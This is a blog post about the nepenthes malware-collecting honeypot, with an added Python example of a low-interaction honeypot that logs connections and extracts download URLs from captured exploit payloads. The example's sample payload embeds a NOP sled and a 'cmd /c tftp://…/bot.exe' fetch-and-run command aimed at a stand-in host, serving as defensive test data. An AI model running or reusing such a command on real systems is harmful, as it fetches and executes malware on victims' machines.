Collecting malware while you browse
This is an awesome idea! These guys wrote a program that sits on the network and waits for the exploitation attempts that worms and bots throw at every reachable host. It doesn't watch your browser; it listens on the ports of services with well-known holes. When an attack comes in, it emulates just enough of the vulnerable service to make the exploit believe it worked, logs the whole exchange, and then grabs the malware the attacker tries to deliver next. That's just cool.
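To make the three steps above concrete, here is a minimal low-interaction honeypot in Python. It is an added example, not nepenthes' own code and not from the original post: it accepts a connection, answers with a canned banner where nepenthes would emulate the real vulnerability, records everything the client sends, and pulls download URLs out of the captured payload the way a collector has to before it can fetch the binary. The banner, the listening port, and the sample payload are constructed for illustration.

```python
"""Minimal low-interaction honeypot in the spirit of nepenthes (added
illustration, not nepenthes' code): answer a canned banner, capture the
attacker's bytes, and extract the download URLs an exploit payload carries."""
import hashlib
import re
import socket
import socketserver
import threading
from datetime import datetime, timezone

# Hypothetical canned reply; a real emulator answers per protocol.
BANNER = b"220 ready\r\n"

# URLs an exploit payload might carry (http/https/ftp/tftp), host[:port][/path].
URL_RE = re.compile(
    rb"(?:https?|ftp|tftp)://[\w.\-]+(?::\d+)?(?:/[\w./\-%~]*)?", re.IGNORECASE
)

# Constructed sample payload: NOP sled, junk bytes, and two embedded download
# URLs (one repeated) of the sort a bot's shellcode contains.
SAMPLE_PAYLOAD = (
    b"\x90" * 8
    + b"\x00\x01\x02 http://198.51.100.7:8080/x.exe\x00"
    + b"cmd /c tftp://198.51.100.7/bot.exe \x00"
    + b"http://198.51.100.7:8080/x.exe\r\n"
)


def extract_download_urls(payload: bytes) -> list:
    """Return the unique URLs in a captured payload, in order of appearance."""
    seen, found = set(), []
    for match in URL_RE.finditer(payload):
        url = match.group(0).decode("ascii", "replace")
        if url not in seen:
            seen.add(url)
            found.append(url)
    return found


def record_session(peer: str, payload: bytes) -> dict:
    """Log entry for one connection: who, when, how much, a hash, and any URLs."""
    return {
        "peer": peer,
        "time": datetime.now(timezone.utc).isoformat(),
        "bytes": len(payload),
        "sha256": hashlib.sha256(payload).hexdigest(),
        "urls": extract_download_urls(payload),
    }


class HoneypotHandler(socketserver.BaseRequestHandler):
    """Send the banner, then read until the client closes or goes quiet."""

    def handle(self):
        self.request.settimeout(5)
        self.request.sendall(BANNER)
        chunks = []
        try:
            while True:
                data = self.request.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except OSError:  # timeout or reset: keep whatever was captured
            pass
        peer = "%s:%d" % self.client_address[:2]
        entry = record_session(peer, b"".join(chunks))
        self.server.log.append(entry)
        print(entry)


class HoneypotServer(socketserver.TCPServer):
    def __init__(self, *args, **kwargs):
        self.log = []  # one record_session() entry per connection
        super().__init__(*args, **kwargs)


def capture_one(payload: bytes, host: str = "127.0.0.1") -> dict:
    """Self-test helper: serve one connection on an ephemeral port, play the
    attacker from a client socket, and return the resulting log entry."""
    with HoneypotServer((host, 0), HoneypotHandler) as server:
        port = server.server_address[1]
        worker = threading.Thread(target=server.handle_request)
        worker.start()
        with socket.create_connection((host, port)) as client:
            banner = client.recv(len(BANNER))
            client.sendall(payload)
        worker.join()
        entry = server.log[-1]
        entry["banner_seen"] = banner == BANNER
        return entry


if __name__ == "__main__":
    # Hypothetical listener port; bind it wherever you want to fake a service.
    with HoneypotServer(("0.0.0.0", 8080), HoneypotHandler) as server:
        server.serve_forever()
```

Run it and point a scanner at the port to see entries logged; `capture_one(SAMPLE_PAYLOAD)` exercises the whole loop over loopback without any network exposure. The real work in nepenthes is the per-vulnerability emulation and shellcode decoding that this canned banner and URL regex stand in for.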
I learned about the tool from Richard Bejtlich’s blog, TaoSecurity. It’s called nepenthes and you can download it from http://nepenthes.mwcollect.org/
One thing I really like about Richard Bejtlich’s blog posts is that he’s very thorough. You can read about his experience installing and using nepenthes at the following URLs:
http://taosecurity.blogspot.com/2006/01/nepenthes-discoveries-earlier-today-i.html
http://taosecurity.blogspot.com/2006/01/nepenthes-installation-ive-been.html
This tool comes prepackaged for all the cool platforms: Gentoo, Debian, and FreeBSD, but of course the source is also provided, along with instructions for getting it compiled and running on Windows.
You can find the README at http://nepenthes.mwcollect.org/documentation:readme.